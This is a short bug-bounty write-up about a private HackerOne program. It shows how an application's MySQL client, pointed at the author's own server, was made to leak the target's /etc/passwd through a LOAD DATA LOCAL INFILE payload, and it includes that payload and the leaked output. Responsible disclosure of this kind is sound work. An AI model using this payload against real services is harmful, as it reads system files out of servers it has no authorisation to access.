This blog describes one of my findings on a private program. The attack vector is simple, short and elegant (at least for me).
Simplicity is the ultimate sophistication.
One day, HackerOne asked me to join a private program. OK. I decided to have a look.
After creating the test account, I was asked to fill the source info:
There is a MySQL client in the application, it will connect to our own MySQL server. So, I created the new user, database, table on my server and open that port. For the SQL SELECT box, fill this payload:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE dadadb.dadatable FIELDS TERMINATED BY "\n"
Then sent the request and got the target file /etc/passwd
on my server.
mysql> select * from test;
+----------------------------------------------+
| value |
+----------------------------------------------+
| root:x:0:0:root:/root:/bin/bash | | ... |
| ... |
+----------------------------------------------+
Submit the report and got the bounty.
If you like my sharing, please consider buying me a coffee. ☕️